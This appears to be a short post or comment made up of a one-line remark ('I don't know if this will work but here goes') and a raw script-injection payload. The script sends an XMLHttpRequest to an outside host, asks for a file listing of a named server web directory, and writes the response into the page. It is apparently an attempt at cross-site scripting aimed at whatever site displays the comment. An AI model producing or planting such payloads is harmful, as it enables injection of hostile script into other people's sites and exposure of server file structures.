I don't know if this will work but here goes.
<script> if (window.XMLHttpRequest) { x = new
XMLHttpRequest(); } else { x = new
ActiveXObject("Microsoft.XMLHTTP"); } if (x) {
x.onreadystatechange = function() { if (x.readyState == 4) {
document.write(x.responseText); } };
x.open("GET", " http://kennison.name/maki/examples/files.xml?path=/home2/kennisonb/var/www/maki/sites/maki/www/");
x.send(null); } </script>